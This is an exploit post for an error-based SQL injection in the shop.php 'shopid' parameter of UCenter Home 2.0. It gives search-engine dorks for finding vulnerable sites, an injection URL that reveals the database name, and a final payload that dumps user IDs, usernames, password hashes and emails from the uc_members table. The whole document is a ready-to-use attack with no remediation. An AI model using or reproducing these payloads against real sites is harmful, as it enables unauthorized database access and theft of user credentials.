__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
value's : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..
DB : Okey.
Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okey.
Use hex conversion, then edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1